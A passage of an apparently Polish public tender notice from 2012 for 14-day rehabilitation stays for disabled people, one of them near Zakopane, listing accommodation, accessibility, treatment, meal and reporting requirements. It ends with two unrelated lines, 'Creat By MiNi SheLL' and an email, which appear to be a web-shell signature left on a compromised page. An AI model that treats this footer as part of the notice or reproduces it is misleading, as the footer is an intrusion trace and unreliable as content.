a)pobyt, noclegi, wypoczynek i rehabilitacja musi odbywać się w obiekcie sanatoryjnym lub wypoczynkowym, przystosowanym do realizacji turnusów rehabilitacyjnych oraz dostosowanym do potrzeb osób niepełnosprawnych z dysfunkcjami lub schorzeniami wymienionymi w pkt 1.a) (bez barier architektonicznych). Obiekt musi posiadać aktualny wpis do rejestru ośrodków, o którym mowa w § 17 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 r. w sprawie turnusów rehabilitacyjnych (Dz. U. z dnia 11 grudnia 2007r.). Zawiadomienie o wpisie do rejestru ośrodków powinno zawierać informację o rodzajach realizowanych turnusów rehabilitacyjnych w tym o turnusie rehabilitacyjnym usprawniająco-rekreacyjnym, w którym będą uczestniczyć osoby w szczególności z następującymi dysfunkcjami lub schorzeniami, wymienionymi w pkt 1.a),  
b)nie dopuszcza się aby obiekt położony był na wzgórzu, w miejscu, do którego dojazd jest stromy, 
c)obiekt przeznaczony do organizacji i przeprowadzenia turnusu rehabilitacyjnego powinien spełniać określone standardy, tj. odpowiednia baza noclegowa i żywieniowa, gabinety lekarskie, zabiegowe, zaplecze do realizacji aktywnych form rehabilitacji. Ośrodek, w którym będą zakwaterowani uczestnicy turnusu musi posiadać stołówkę,  
d)przy ośrodku powinno znajdować się miejsce do zorganizowania ogniska lub grilla integracyjnego,  
e)ośrodek, pokoje oraz łazienki powinny być czyste i zadbane, 
f)ilość posiadanego sprzętu musi być adekwatna do ilości wykonywanych zabiegów dla uczestników turnusu.
4)Zamawiający nie dopuszcza zakwaterowania w namiotach, domkach campingowych, budynkach szkolnych pod rygorem wypowiedzenia umowy.
5)Zamawiający zastrzega również, iż do obowiązków Wykonawcy będzie należało:
a)niezwłoczne zawiadomienie Zamawiającego o każdym przypadku przerwania turnusu rehabilitacyjnego przez jego uczestnika,
b)przesłanie Zamawiającemu w terminie do 14 dni od zakończenia turnusu rehabilitacyjnego faktur i informacji o przebiegu turnusu rehabilitacyjnego,
c)ustawienie w widocznym miejscu tablicy informacyjnej (banera roll-up dostarczonego przez Zamawiającego) o dofinansowaniu ze środków EFS pobytu uczestnika na turnusie osób niepełnosprawnych i zwrotu tablicy informacyjnej (banera roll-up) w stanie nienaruszonym w dniu zakończenia turnusu.
Wykonawca zobowiązany jest wykonać usługę zgodnie z przepisami Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 roku w sprawie turnusów rehabilitacyjnych (Dz. U. Nr 230 poz. 1694), zwanego dalej Rozporządzeniem.

Przed rozpoczęciem turnusu Wykonawca jest zobowiązany do opracowania szczegółowego programu pobytu uczestników na turnusie. 
Wykonawca jest zobowiązany do zapoznania uczestników z programem realizacji turnusu rehabilitacyjnego. 
Wykonawca prześle Zamawiającemu szczegółowy program pobytu uczestników na turnusie, najpóźniej na 3 dni po zawarciu umowy. Zamawiający zastrzega sobie możliwość dokonania zmiany w zaproponowanym programie. 
Wykonawca jest zobowiązany przekazać Zamawiającemu w ciągu 14 dni po zakończeniu turnusu rehabilitacyjnego informacji o przebiegu turnusu, o której mowa w art. 10c ust. 7 pkt 4 ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz. U. z 2011 r. Nr 127 poz. 721 z późn. zm.),
Wykonawca jest zobowiązany do przetwarzania danych osobowych uczestników wyłącznie w zakresie realizacji turnusu, zgodnie z ustawą z dnia 29 sierpnia 1997 roku o ochronie danych osobowych (t. j. z 2002 roku Nr 101 poz. 926 ze zm).
Wykonawca zarezerwuje dla każdej z części jeden pokój jednoosobowy dla opiekuna turnusu (koordynatora) z ramienia Zamawiającego. Wykonawca nie wlicza kosztu pobytu opiekuna w wycenę zamówienia. Opłata za turnus leży po stronie opiekuna..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9, 85.31.25.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 14 DNIOWY TURNUS REHABILITACYJNY USPRAWNIAJĄCO - REKREACYJNY W 	ZAKOPANEM LUB OŚRODKU ODDALONYM OD ZAKOPANEGO MAKSYMALNIE o 20 KM.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)Turnus kierowany dla następujących grup osób niepełnosprawnych z dysfunkcją i schorzeniami:
a)Z dysfunkcją: narządu ruch, z uwzględnieniem osób poruszających się na wózkach inwalidzkich, narządu wzroku, ze schorzeniami: układu oddechowego, układu krążenia, 
z upośledzeniem umysłowym, z zaburzeniami głosu, mowy i chorobami słuchu, 
z chorobami psychicznymi, z chorobami neurologicznymi, z epilepsją, z padaczką, 
z nerwicą, z mózgowym porażeniem dziecięcym, z cukrzycą, 
b)Turnus obejmuje 32 osób niepełnosprawnych oraz 9 opiekunów osób niepełnosprawnych.  Wykaz osób wraz z rodzajem schorzeń Zamawiający dostarczy Wykonawcy najpóźniej na 3-4 dni przed rozpoczęciem turnusu. 
Zamawiający zastrzega, iż może ulec niewielkiej zmianie liczba uczestników oraz opiekunów turnusu.  
2)Wykonawca będący organizatorem turnusu rehabilitacyjnego zapewni dla każdego uczestnika turnusu: 
a)realizację turnusu rehabilitacyjnego usprawniająco-rekreacyjnego dla osób niepełnosprawnych
b)kadrę gwarantującą prawidłową organizację i realizację programu turnusu (w tym możliwość szybkiej konsultacji psychiatrycznej w razie potrzeby), 
c)badanie lekarskie na początku i na końcu turnusu rehabilitacyjnego, 
d)3 zabiegi rehabilitacyjne wykonywane dziennie dla każdego uczestnika turnusu rehabilitacyjnego według zaleceń lekarza wykonywane w dni powszednie (z wyjątkiem sobót i niedziel), uwzględniające stan zdrowia uczestnika turnusu rehabilitacyjnego. Ilość posiadanego sprzętu musi być adekwatna do ilości wykonywanych zabiegów dla uczestników turnusu, 
e)stałą opiekę pielęgniarską i korzystanie z opieki lekarskiej podczas turnusu i w każdej nagłej sytuacji związanej z pogorszeniem stanu zdrowia uczestnika,      
f)całodzienne wyżywienie składające się z trzech posiłków uwzględniające diety wynikające z posiadanych schorzeń przez uczestników: śniadanie, obiad (dwudaniowy z kompotem) i kolacja z zastrzeżeniem, iż w dniu przyjazdu rozpoczyna się obiadokolacją, a w dniu powrotu Wykonawca zapewni uczestnikom turnusu i ich opiekunom suchy prowiant na czas podróży. Żywienie uczestników turnusu i ich opiekunów powinno odbywać się zgodnie z zasadami racjonalnego żywienia oraz z zachowaniem zasad higieny, 
g)zakwaterowanie wszystkich uczestników turnusu i ich opiekunów w jednej miejscowości i w jednym obiekcie (uczestnicy turnusu powinni być usytuowani w pokojach blisko siebie) w pokojach: 2 - osobowych z pełnym węzłem sanitarnym, tj. wc, umywalka i natrysk w każdym pokoju (z całodobowym dostępem do ciepłej i zimnej wody). Każdy pokój musi być wyposażony w jednoosobowe łóżka z pościelą, ręczniki, papier toaletowy, szafy ubraniowe, krzesła i stoliki, szafki przy łóżkach (wyklucza się łóżka piętrowe), TV, czajnik bezprzewodowy, 
h)łazienki w pokojach 2 - osobowych, muszą być dostosowane do osób poruszających się na wózkach inwalidzkich. Łazienki muszą być wyposażone w odpowiednie miejsca prysznicowe, uchwyty, poręcze zarówno w miejscu kąpielowym jak i przy wc, siedziska lub wózki toaletowo-kąpielowe. Powierzchnia tych pokoi i łazienek powinna pozwalać na swobodne poruszanie się osób na wózkach inwalidzkich. Jeżeli powierzchnia pokoju 2 - osobowego jest niewystarczająca to należy taką osobę zakwaterować wraz z opiekunem w pokoju 3-osobowym.
i)opłacenie opłaty uzdrowiskowej/klimatycznej za wszystkich uczestników turnusu i opiekunów, jeśli wymagać będzie tego lokalizacja ośrodka, 
j)zorganizowanie wypoczynku dla uczestników turnusu i ich opiekunów, w tym 1 wycieczki krajoznawczej (zwiedzanie atrakcji turystycznych) z licencjowanym przewodnikiem 
w miejscowości w której odbywa się turnus lub poza miejscowość, w której odbywa się turnus z uwzględnieniem wynajmu środków transportu oraz wszystkich kosztów związanych ze zorganizowaniem wycieczki. Wykonawca w trakcie trwania turnusu zorganizuje  nieodpłatnie 3 imprezy o charakterze integracyjnym i aktywizacyjnym, w tym wieczorek integracyjny oraz imprezę podsumowującą turnus, 2 ogniska lub grille z wyżywieniem, tj. pieczenie kiełbasek. 
k)animatora dla uczestników turnusu odpowiedzialnego za koordynację pobytu grupy na turnusie rehabilitacyjnym, 
l)ubezpieczenie NNW dla każdego uczestnika turnusu i opiekuna na turnusie rehabilitacyjnym 
i wycieczce krajoznawczej  na kwotę 10.000 zł. na każdą osobę. 
3)Wymagania dotyczące Ośrodka: 
a)pobyt, noclegi, wypoczynek i rehabilitacja musi odbywać się w obiekcie sanatoryjnym lub wypoczynkowym, przystosowanym do realizacji turnusów rehabilitacyjnych oraz dostosowanym do potrzeb osób niepełnosprawnych z dysfunkcjami lub schorzeniami wymienionymi w pkt. 2.a) (bez barier architektonicznych). Obiekt musi posiadać aktualny wpis do rejestru ośrodków, o którym mowa w § 17 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 r. w sprawie turnusów rehabilitacyjnych (Dz. U. z dnia 11 grudnia 2007r.). Zawiadomienie o wpisie do rejestru ośrodków powinno zawierać informację o rodzajach realizowanych turnusów rehabilitacyjnych w tym o turnusie rehabilitacyjnym usprawniająco-rekreacyjnym, w którym będą uczestniczyć osoby w szczególności z następującymi dysfunkcjami lub schorzeniami, wymienionymi w pkt. 2.a),
b)nie dopuszcza się aby obiekt położony był na wzgórzu, w miejscu, do którego dojazd jest stromy - wśród uczestników turnusu będą 2 osoby poruszające się na wózkach inwalidzkich), 
c)obiekt przeznaczony do organizacji i przeprowadzenia turnusu rehabilitacyjnego powinien spełniać określone standardy, tj. odpowiednia baza noclegowa i żywieniowa, gabinety lekarskie, zabiegowe, zaplecze do realizacji aktywnych form rehabilitacji. Ośrodek, w którym będą zakwaterowani uczestnicy turnusu musi posiadać stołówkę, 
d)przy ośrodku powinno znajdować się miejsce do zorganizowania co najmniej 1 ogniska lub grilla integracyjnego,  
e)ośrodek, pokoje oraz łazienki powinny być czyste i zadbane, 
f)ilość posiadanego sprzętu musi być adekwatna do ilości wykonywanych zabiegów dla uczestników turnusu.
4)Zamawiający nie dopuszcza zakwaterowania w namiotach, domkach campingowych, budynkach szkolnych pod rygorem wypowiedzenia umowy.
5)Zamawiający zastrzega również, iż do obowiązków Wykonawcy będzie należało:
a)niezwłoczne zawiadomienie Zamawiającego o każdym przypadku przerwania turnusu rehabilitacyjnego przez jego uczestnika,
b)przesłanie Zamawiającemu w terminie do 14 dni od zakończenia turnusu rehabilitacyjnego faktur i informacji o przebiegu turnusu rehabilitacyjnego,
c)ustawienie w widocznym miejscu tablicy informacyjnej (banera roll-up dostarczonego przez Zamawiającego) o dofinansowaniu ze środków EFS pobytu uczestnika na turnusie osób niepełnosprawnych i zwrotu tablicy informacyjnej (banera roll-up) w stanie nienaruszonym 
w dniu zakończenia turnusu.

Przed rozpoczęciem turnusu Wykonawca jest zobowiązany do opracowania szczegółowego programu pobytu uczestników na turnusie. 
Wykonawca jest zobowiązany do zapoznania uczestników z programem realizacji turnusu rehabilitacyjnego. 
Wykonawca prześle Zamawiającemu szczegółowy program pobytu uczestników na turnusie, najpóźniej na 3 dni po zawarciu umowy. Zamawiający zastrzega sobie możliwość dokonania zmiany w zaproponowanym programie. 
Wykonawca jest zobowiązany przekazać Zamawiającemu w ciągu 14 dni po zakończeniu turnusu rehabilitacyjnego informacji o przebiegu turnusu, o której mowa w art. 10c ust. 7 pkt 4 ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz. U. z 2011 r. Nr 127 poz. 721 z późn. zm.),
Wykonawca jest zobowiązany do przetwarzania danych osobowych uczestników wyłącznie w zakresie realizacji turnusu, zgodnie z ustawą z dnia 29 sierpnia 1997 roku o ochronie danych osobowych (t. j. z 2002 roku Nr 101 poz. 926 ze zm).
Wykonawca zarezerwuje dla każdej z części jeden pokój jednoosobowy dla opiekuna turnusu (koordynatora) z ramienia Zamawiającego. Wykonawca nie wlicza kosztu pobytu opiekuna w wycenę zamówienia. Opłata za turnus leży po stronie opiekuna. 
Wykonawca zobowiązany jest wykonać usługę zgodnie z przepisami Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 roku w sprawie turnusów rehabilitacyjnych (Dz. U. Nr 230 poz. 1694), zwanego dalej Rozporządzeniem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9, 85.31.25.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com